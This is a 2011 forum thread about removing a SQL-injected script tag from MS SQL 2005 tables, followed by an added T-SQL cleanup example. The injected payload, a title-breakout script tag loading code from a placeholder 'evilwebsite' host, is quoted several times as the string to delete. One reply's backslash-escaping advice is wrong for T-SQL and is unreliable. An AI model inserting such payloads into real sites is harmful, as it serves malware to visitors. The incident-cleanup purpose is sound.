Author Topic: sql geniuses  (Read 939 times)

41magsnub

  • friend
  • Senior Member
  • ***
  • Posts: 7,579
  • Don't make me assume my ultimate form!
sql geniuses
« on: December 14, 2011, 08:13:27 PM »
Disclaimer:  I do not manage SQL server for this customer and I know this is bad..  this is to fix the end result of a sql injection attack.  New customer, getting paid to fix and will make recommendations afterwards.  It is in MS SQL 2005

Their backups suck.  They are already working with some web devs to fix the code on their site so this can't happen in the future and I have revamped the backup scheme to something that actually, you know...  backs up somewhere.

There was a sql injection attack, the string:  "></title><script src="http://evilwebsite/file.php"></script><!--  was inserted just before the real data in gobs of fields in multiple tables.  Note the odd number of "'s

I am trying to write a sql replace query to wipe out the evil string with nothing to repair the DB.  It is not ideal but it is what we've got.  However, the jackasses who did the attack are smarter than me in SQL and stuck a " in the string so my commands fail due to the unclosed quotes.  Can one of you geniuses show me how to write a query that will do what I need with the screwy quotes?

I have the infected table up on another server right now to test on.
« Last Edit: December 14, 2011, 08:42:01 PM by 41magsnub »

GigaBuist

  • friends
  • Senior Member
  • ***
  • Posts: 4,345
    • http://www.justinbuist.org/blog/
Re: sql geniuses
« Reply #1 on: December 14, 2011, 09:00:12 PM »
Code:
UPDATE tblData
SET txtField = REPLACE(txtField, '"></title><script src="http://evilwebsite/file.php"></script><!--', '');
If you start with single quotes I don't think the double quotes will cause you any trouble.  If they do, escape them with a backslash (\):
Code:
UPDATE tblData
SET txtField = REPLACE(txtField, '\"></title><script src=\"http://evilwebsite/file.php\"></script><!--', '');

Edited post to stick SQL into code blocks.  Should make it easier to tell when I use apostrophe, double quotes, and two apostrophes together.
« Last Edit: December 14, 2011, 09:04:58 PM by GigaBuist »

41magsnub

Re: sql geniuses
« Reply #2 on: December 14, 2011, 09:32:41 PM »
thanks!  I'll give that a whack.

41magsnub

Re: sql geniuses
« Reply #3 on: December 14, 2011, 09:53:46 PM »
moot point, the data is pretty static and they are going to roll back to the one backup I found from a couple of months ago.  I'll play with this tomorrow though.

Thanks again!

CNYCacher

  • friend
  • Senior Member
  • ***
  • Posts: 4,438
Re: sql geniuses
« Reply #4 on: December 14, 2011, 11:52:11 PM »
You were getting tripped up because you were using double quotes around the thing you were searching for.

Let's say that this is the malicious code:
foo"bar

You were trying to match it like this: "foo"bar"
Which was obviously breaking

Get around it by doing this instead: 'foo"bar'
Or this: "foo\"bar"

This will not work: 'foo\"bar'
On two occasions, I have been asked [by members of Parliament], "Pray, Mr. Babbage, if you put into the machine wrong figures, will the right answers come out?" I am not able to rightly apprehend the kind of confusion of ideas that could provoke such a question.
Charles Babbage
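A worked T-SQL version of the cleanup that GigaBuist's UPDATE and CNYCacher's quoting explanation describe, added here as an example and not posted by anyone in the thread. It targets MS SQL 2005 (T-SQL), where a string literal is delimited by single quotes, a literal single quote inside it is written as two single quotes, and backslash is not an escape character (so the '\"' form never matches). The table name tblData, column txtField and key column id are assumed for the demo; the injected string is the one quoted in the first post. The example adds what the thread's one-liner leaves out: counting and previewing affected rows before writing, restricting the UPDATE to rows that actually contain the payload, running it in a transaction so the result can be checked and rolled back, and the cast needed for text/ntext columns.

```sql
-- Added example (not from the thread): removing an injected <script> tag from a column
-- in MS SQL 2005 using T-SQL. Table/column names are assumed for the demo.
-- Run this on the copy of the infected table first, as the original poster did.

-- Single quotes delimit the literal, so the double quotes inside need no escaping.
-- Backslash is NOT an escape character in T-SQL; '\"' would search for a literal backslash.
-- A single quote inside the literal would be written as '' (two single quotes).
DECLARE @evil NVARCHAR(200);
SET @evil = N'"></title><script src="http://evilwebsite/file.php"></script><!--';

-- 1. Measure before touching anything: how many rows carry the payload?
SELECT COUNT(*) AS hits
FROM tblData
WHERE CHARINDEX(@evil, txtField) > 0;

-- 2. Preview the before/after values for the affected rows only.
SELECT id,
       txtField                        AS before_value,
       REPLACE(txtField, @evil, N'')   AS after_value
FROM tblData
WHERE CHARINDEX(@evil, txtField) > 0;

-- 3. Apply inside a transaction so the write can be verified and rolled back.
BEGIN TRANSACTION;

UPDATE tblData
SET txtField = REPLACE(txtField, @evil, N'')
WHERE CHARINDEX(@evil, txtField) > 0;   -- write only rows that contain the payload

SELECT @@ROWCOUNT AS rows_updated;      -- should equal the count from step 1

-- 4. Check for anything script-like left behind (a second payload variant, for example).
--    If this returns more than 0, inspect those rows and ROLLBACK TRANSACTION instead.
SELECT COUNT(*) AS leftover
FROM tblData
WHERE txtField LIKE N'%<script%';

COMMIT TRANSACTION;

-- Caveat for SQL 2005 schemas that still use text/ntext columns: REPLACE does not accept
-- those types directly, so cast to NVARCHAR(MAX) on both sides of the comparison:
-- UPDATE tblData
-- SET txtField = REPLACE(CAST(txtField AS NVARCHAR(MAX)), @evil, N'')
-- WHERE CHARINDEX(@evil, CAST(txtField AS NVARCHAR(MAX))) > 0;
```

The same pattern repeats per table and column; if the injected text landed in "gobs of fields in multiple tables", as the first post says, the counting query in step 1 is the quickest way to build the list of columns that actually need the UPDATE before running it against each one.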